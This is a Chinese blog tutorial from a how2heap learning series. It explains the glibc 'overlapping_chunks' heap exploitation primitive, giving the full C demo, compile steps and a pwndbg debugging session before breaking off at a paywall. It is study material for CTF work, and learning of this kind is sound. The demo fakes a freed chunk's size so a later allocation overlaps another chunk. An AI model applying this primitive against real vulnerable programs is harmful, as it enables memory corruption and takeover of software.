从零开始学howtoheap:理解fastbins的堆块重叠的问题1

已于 2024-09-17 08:30:55 修改
阅读量1k 收藏 14
点赞数 29
分类专栏: 逆向 二进制 Re 文章标签: 网络安全 安全 安全架构 系统安全
于 2024-02-12 10:16:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44626085/article/details/136099541
版权

how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。环境可参见从零开始配置pwn环境:从零开始配置pwn环境:从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令-CSDN博客

1.fastbins的overlapping_chunks攻击

这是一个简单的堆块重叠问题,首先申请 3 个 chunk
这三个 chunk 分别申请到了:
p1:0x603010
p2:0x603110
p3:0x603210
给他们分别填充"1""2""3"

free 掉 p2
p2 被放到 unsorted bin 中
现在假设有一个堆溢出漏洞,可以覆盖 p2
为了保证堆块稳定性,我们至少需要让 prev_inuse 为 1,确保 p1 不会被认为是空闲的堆块
我们将 p2 的大小设置为 385, 这样的话我们就能用 376 大小的空间

现在让我们分配另一个块,其大小等于块p2注入大小的数据大小
malloc 将会把前面 free 的 p2 分配给我们(p2 的 size 已经被改掉了)

p4 分配在 0x603110 到 0x603288 这一区域
p3 从 0x603210 到 0x603288
p4 应该与 p3 重叠,在这种情况下 p4 包括所有 p3
这时候通过编辑 p4 就可以修改 p3 的内容,修改 p3 也可以修改 p4 的内容

 

2.overlapping_chunks演示程序

#include <stdio.h>
         #include <stdlib.h>
         #include <string.h>
         #include <stdint.h>
         
         int main(int argc , char* argv[]){
         
             intptr_t *p1,*p2,*p3,*p4;
             fprintf(stderr, "这是一个简单的堆块重叠问题,首先申请 3 个 chunk\n");
         
             p1 = malloc(0x100 - 8);
             p2 = malloc(0x100 - 8);
             p3 = malloc(0x80 - 8);
             fprintf(stderr, "这三个 chunk 分别申请到了:\np1:%p\np2:%p\np3:%p\n给他们分别填充\"1\"\"2\"\"3\"\n\n", p1, p2, p3);
         
             memset(p1, '1', 0x100 - 8);
             memset(p2, '2', 0x100 - 8);
             memset(p3, '3', 0x80 - 8);
         
             fprintf(stderr, "free 掉 p2\n");
             free(p2);
             fprintf(stderr, "p2 被放到 unsorted bin 中\n");
         
             fprintf(stderr, "现在假设有一个堆溢出漏洞,可以覆盖 p2\n");
             fprintf(stderr, "为了保证堆块稳定性,我们至少需要让 prev_inuse 为 1,确保 p1 不会被认为是空闲的堆块\n");
         
             int evil_chunk_size = 0x181;
             int evil_region_size = 0x180 - 8;
             fprintf(stderr, "我们将 p2 的大小设置为 %d, 这样的话我们就能用 %d 大小的空间\n",evil_chunk_size, evil_region_size);
         
             *(p2-1) = evil_chunk_size; // 覆盖 p2 的 size
         
             fprintf(stderr, "\n现在让我们分配另一个块,其大小等于块p2注入大小的数据大小\n");
             fprintf(stderr, "malloc 将会把前面 free 的 p2 分配给我们(p2 的 size 已经被改掉了)\n");
             p4 = malloc(evil_region_size);
         
             fprintf(stderr, "\np4 分配在 %p 到 %p 这一区域\n", (char *)p4, (char *)p4+evil_region_size);
             fprintf(stderr, "p3 从 %p 到 %p\n", (char *)p3, (char *)p3+0x80-8);
             fprintf(stderr, "p4 应该与 p3 重叠,在这种情况下 p4 包括所有 p3\n");
         
             fprintf(stderr, "这时候通过编辑 p4 就可以修改 p3 的内容,修改 p3 也可以修改 p4 的内容\n\n");
         
             fprintf(stderr, "接下来验证一下,现在 p3 与 p4:\n");
             fprintf(stderr, "p4 = %s\n", (char *)p4+0x10);
             fprintf(stderr, "p3 = %s\n", (char *)p3+0x10);
         
             fprintf(stderr, "\n如果我们使用 memset(p4, '4', %d), 将会:\n", evil_region_size);
             memset(p4, '4', evil_region_size);
             fprintf(stderr, "p4 = %s\n", (char *)p4+0x10);
             fprintf(stderr, "p3 = %s\n", (char *)p3+0x10);
         
             fprintf(stderr, "\n那么之后再 memset(p3, '3', 80), 将会:\n");
             memset(p3, '3', 80);
             fprintf(stderr, "p4 = %s\n", (char *)p4+0x10);
             fprintf(stderr, "p3 = %s\n", (char *)p3+0x10);
         }

3.调试overlapping_chunks

3.1 获得可执行程序 

gcc -g overlapping_chunks.c -o overlapping_chunks

3.2 第一次调试程序

root@pwn_test1604:/ctf/work/how2heap# gcc -g overlapping_chunks.c -o overlapping_chunks
root@pwn_test1604:/ctf/work/how2heap# ll
total 232
drwxr-xr-x  2 1000 1000  4096 Feb 12 01:24 ./
drwxr-xr-x 12 1000 1000  4096 Feb  8 13:06 ../
-rwxr-xr-x  1 root root 11168 Feb  9 02:26 fastbin_dup*
-rw-r--r--  1 1000 1000  1383 Feb  9 02:25 fastbin_dup.c
-rwxr-xr-x  1 root root 11176 Feb 10 03:42 fastbin_dup_consolidate*
-rw-r--r--  1 1000 1000   957 Feb 10 03:27 fastbin_dup_consolidate.c
-rwxr-xr-x  1 root root 15432 Feb  9 04:05 fastbin_dup_into_stack*
-rw-r--r--  1 1000 1000  2124 Feb  9 03:52 fastbin_dup_into_stack.c
-rwx--x--x  1 1000 1000 15224 Feb  8 13:26 first_fit*
-rwxr-xr-x  1 root root 21408 Feb  8 15:02 first_fit1*
-rw-r--r--  1 1000 1000  1591 Feb  8 13:16 first_fit.c
-rw-------  1 root root 12944 Feb 12 01:13 .gdb_history
-rwxr-xr-x  1 root root 15744 Feb 11 13:15 house_of_lore*
-rw-r--r--  1 1000 1000  2794 Feb 11 13:15 house_of_lore.c
-rwxr-xr-x  1 root root 11240 Feb 11 03:43 house_of_spirit*
-rw-r--r--  1 1000 1000  1575 Feb 11 03:43 house_of_spirit.c
-rwxr-xr-x  1 root root 15512 Feb 12 01:24 overlapping_chunks*
-rw-r--r--  1 1000 1000  2929 Feb 12 01:23 overlapping_chunks.c
-rwxr-xr-x  1 root root 15624 Feb 11 04:37 poison_null_byte*
-rw-r--r--  1 1000 1000  2853 Feb 11 04:36 poison_null_byte.c
-rwxr-xr-x  1 root root 10176 Feb  8 15:20 uaf*
-rw-r--r--  1 1000 1000  1023 Feb  8 15:19 uaf.c
-rwxr-xr-x  1 root root 15544 Feb 10 05:39 unsafe_unlink*
-rw-r--r--  1 1000 1000  2965 Feb 10 05:39 unsafe_unlink.c
root@pwn_test1604:/ctf/work/how2heap# gdb ./overlapping_chunks
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./overlapping_chunks...done.
pwndbg> r
Starting program: /ctf/work/how2heap/overlapping_chunks 
这是一个简单的堆块重叠问题,首先申请 3 个 chunk
这三个 chunk 分别申请到了:
p1:0x603010
p2:0x603110
p3:0x603210
给他们分别填充"1""2""3"

free 掉 p2
p2 被放到 unsorted bin 中
现在假设有一个堆溢出漏洞,可以覆盖 p2
为了保证堆块稳定性,我们至少需要让 prev_inuse 为 1,确保 p1 不会被认为是空闲的堆块
我们将 p2 的大小设置为 385, 这样的话我们就能用 376 大小的空间

现在让我们分配另一个块,其大小等于块p2注入大小的数据大小
malloc 将会把前面 free 的 p2 分配给我们(p2 的 size 已经被改掉了)

p4 分配在 0x603110 到 0x603288 这一区域
p3 从 0x603210 到 0x603288
p4 应该与 p3 重叠,在这种情况下 p4 包括所有 p3
这时候通过编辑 p4 就可以修改 p3 的内容,修改 p3 也可以修改 p4 的内容

接下来验证一下,现在 p3 与 p4:
p4 = 22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222
p3 = 33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333�

如果我们使用 memset(p4, '4', 376), 将会:
p4 = 444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444�
p3 = 44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444�

那么之后再 memset(p3, '3', 80), 将会:
p4 = 444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444333333333333333333333333333333333333333333333333333333333333333333333333333333334444444444444444444444444444444444444444�
p3 = 33333333333333333333333333333333333333333333333333333333333333334444444444444444444444444444444444444444�
[Inferior 1 (process 114) exited normally]
pwndbg>

 

3.3 第二次调试程序

3.3.1 ​设置断点第14行并走起

这个比较简单,就是堆块重叠的问题。通过一个溢出漏洞,改写unsorted bin 中空闲堆块的size,改变下一次malloc可以返回的堆块大小。

​ 直接动手调试,首先申请三个堆块。

pwndbg> b 14
Breakpoint 2 at 0x4006dd: file overlapping_chunks.c, line 14.
pwndbg> c
Continuing.
这是一个简单的堆块重叠问题,首先申请 3 个 chunk

Breakpoint 2, main (argc=1, argv=0x7fffffffe6a8) at overlapping_chunks.c:14
14                   fprintf(stderr, "这三个 chunk 分别申请到了:\np1:%p\np2:%p\np3:%p\n给他们分别填充\"1\"\"2\"\"3\"\n\n", p1, p2, p3);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────────────────────────────────────
 RAX  0x603210 ◂— 0x0
 RBX  0x0
 RCX  0x7ffff7dd1b20 (main_arena) ◂— 0x100000000
 RDX  0x603210 ◂— 0x0
 RDI  0x0
 RSI  0x603280 ◂— 0x0
 R8   0x603000 ◂— 0x0
 R9   0xd
 R10  0x7ffff7dd1b78 (main_arena+88) —▸ 0x603280 ◂— 0x0
 R11  0x0
 R12  0x400590 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffe6a0 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe5c0 —▸ 0x400a40 (__libc_csu_init) ◂— push   r15
 RSP  0x7fffffffe580 —▸ 0x7fffffffe6a8 —▸ 0x7fffffffe8d1 ◂— '/ctf/work/how2heap/overlapping_chunks'
 RIP  0x400
最低0.47元/天 解锁文章
网络安全我来了
关注
专栏目录
【1】从零开始习目标检测:YOLO算法详解
YOLOv8项目贡献者
03-25 2万+
目标检测目标检测的目标是在图像或视频中检测出目标的位置和边界框,
从零开始:基于LLM大模型构建智能应用程序的完整指南
热门推荐
程序员光剑
06-07 1万+
在我们即将发布的帖子中,我们将讨论 LLM 链、意图识别、添加特定于任务的工具、集群、创建推荐系统、微调开源 LLM 以及我们测试系统的方式等话题不断改进并从研究和开源社区中习。在零样本习中,语言模型被要求在没有明确示例的情况下完成任务,而在少样本习中,为模型提供了有限数量的示例,或“少样本”,嵌入在提示中. 提示对于将模型引导到一个方向并避免产生幻觉非常重要。根据您的需要,其他方法可能更有效。LLM大模型是一种基于深度习技术的模型,它可以自动习并理解大量的数据,从而实现高效、准确的预测和分类。
从0开始how2heap(1(讲一些基础和我入门时的感受,没啥干货,非入门直接跳过即可))#施工中,还有些自相矛盾的地方
m0_50526323的博客
05-30 684
一.开始之前 (与主题无关,看干货直接跳过一些即可) 1.安装Ubuntu16.04 虚拟机 2.安装pwndbg git clone https://github.com/pwndbg/pwndbg cd pwndbg sudo ./setup.sh 输入 gdb 后出现如下,说明安装成功, 若失败则在home中: sudo vim ./.gdbinit 添加如下路径,并注释其余 source /home/yourname/pwndbg/gdbinit.py 二.first_fit ps:代码一行太
how2heap 深入习(1)
CoLin的pwn小屋
02-10 2837
how2heap glibc 2.23
how2heap总结-上
hl1293348082的专栏
04-07 707
0x00 前言 "how2heap"是shellphish团队在Github上开源的堆漏洞系列教程. 我这段时间一直在习堆漏洞利用方面的知识,看了这些利用技巧以后感觉受益匪浅. 这篇文章是我习这个系列教程后的总结,在此和大家分享.我会尽量翻译原版教程的内容,方便英语不太好的同习。 源码部分我的可能和原版教程不一样,改动的地方我是为了方便自己理解,所以还是建议大家看这篇总结之前去看原版教程。 不过在习这些技巧之前,建议大家去看一看华庭写的"Glibc内存管理-Ptmalloc2源码分析"
how2heap个人习总结
u014377094的博客
04-17 720
how2heap个人习总结 1.fastbin_dup double free基本操作 2.27下由于多了tcache,可以先free7个填满tcache再calloc3个后free放入fastbin。calloc与malloc区别除了对语法略有不同,会对内容初始化以外还会跳过tcache直接执行int_malloc。 后续2.31,32,33,34无区别。 2.fastbin_dup_into_stack double free基操,有一点需要注意,fast chunk在获取时会对其大小 进行检测,检查
How2Heap笔记(一)
kelxLZ的博客
01-21 2700
Author:ZERO-A-ONE Date:2021-01-21 ​ “how2heap”是shellphish团队在Github上开源的堆漏洞系列教程。上面有很多常见的堆漏洞教示例,实现了以下技术: File Technique Glibc-Version Patch Applicable CTF Challenges first_fit.c Demonstrating glibc malloc’s first-fit behavior. calc_tcache_idx..
如何理解margin重叠问题
weixin_47450807的博客
04-08 3440
一、写在前面 根据w3c规范,两个margin产生折叠的必备条件: 1、必须处于常规文档流(不能是浮动和定位)的块级盒子,并且处于同一个BFC当中。 2、没有线盒,没有空隙,没有padding和border将他们分割。 3、都处于垂直方向相邻的外边距。 二、例子 <!DOCTYPE html> <html lang="cn"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compa
osg::Geomtery多图元重叠闪烁问题
woaicd的专栏
07-28 3075
void DrawGeom() { if(!_geom.valid()) { _geom = new osg::Geometry; _geom->setDataVariance(osg::Object::DYNAMIC);\ _geom->getOrCreateStateSet()->setMode(GL_BLEND,osg:
从零开始实现信号槽机制:二
Cloud_Castle的博客
09-04 1万+
到这里应该差不多了,总结一下。我们在上篇博文中实现的sigslot机制已经能够比较好地实现两个组件之间的解耦,但是缺点是设计库时需要针对不同参数数量的信号与链接需要重复编码,槽函数必须继承一个共同的基类等。而Qt的信号槽机制建立在其庞大的元对象体系之上,由于其信号与槽函数的参数类型可以随时随地查到,因此在传参时可以仅仅传递一个void*类型的指针,然后通过虚函数机制调用为被调类写好的qt_matecall(),就很容易对参数反向解析从而调用相应的槽函数了。基本上是以一定的性能损失换来了更高的灵活性,也算是各
how2heap 深入习(2)
CoLin的pwn小屋
02-12 785
glibc 2.23源码分析系列之house_of_mind_fastbin + house of orange
从零开始howtoheap:解题西湖论剑Storm_note
最新发布
weixin_44626085的博客
02-14 1197
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来习。
how2heap—glibc 2.23—unsafe_unlink.c
xy_369的博客
06-22 201
①:p 是高地址的 chunk ,if 判断中首先检测 P 的 Size 字段的 P 位是否为 0 ,是则说明物理相邻的低地址 chunk 为 free chunk ,可以向后合并,然后就获取 p 的 Prev_size,将 p 的 Prev_size 加到 p 的 Size 就算把物理相邻的低地址 chunk 合并了,然后将 p 指向被合并的低地址 chunk ,再利用 unlink 将其从 bin 中删除就算完成了向后合并。②:第一句检测过后,会执行 FD = P->fd;BK = P->bk;
how2heap总结
Juny0117的博客
12-07 754
今天,让我们来总结下how2heap,之前粗略过了一下,但最近发现还是有很多细节不太清楚,于是现在回头来重新调试下how2heap。 就按顺序来吧。 0x01 fastbin_dup: 源码: 1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main() 5 { 6 ...
从零开始howtoheapfastbins的house_of_spirit攻击2
weixin_44626085的博客
02-11 987
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来习。
从零开始howtoheapfastbins的house_of_spirit攻击1
weixin_44626085的博客
02-11 998
伪造chunk时需要绕过一些检查,首先是标志位,PREV_INUSE位并不影响 free的过程,但IS_MMAPPED位和位都要为零。其次,在64位系统中fast chunk的大小要在 32~128 字节之间。最后,是next chunk的大小,必须大于2*SIZE_SZ(即大于16),小于(即小于128kb),才能绕过对next chunk大小的检查。​ 所以house_of_spirit的主要目的是,当我们伪造的fake chunk内部存在不可控区域时,运用这一技术可以将这片区域变成可控的。
从零开始howtoheapfastbins的double-free攻击实操2
weixin_44626085的博客
02-10 1027
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来习。环境可参见。
how2heap glibc 2.27
qq_46441427的博客
10-10 741
fastbin dup 展示了glibc2.27里利用double free进行的fastbin attack #include <stdio.h> #include <stdlib.h> #include <assert.h> int main() { setbuf(stdout, NULL); printf("This file demonstrates a simple double-free attack with fastbins.\n"); pri
ptmalloc——fastbins
weixin_34414196的博客
06-21 292
2019独角兽企业重金招聘Python工程师标准>>> ...
嵌入式习路径:从零到高手的精华指南
这个资源提供了一条清晰的习路径,从零开始,逐步引导习者成为嵌入式专家。首先,它强调了建立一个稳定的Linux环境的重要性,推荐使用Fedora9,并提供了VMware虚拟机的安装指南,以便于在不干扰现有系统的前提下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值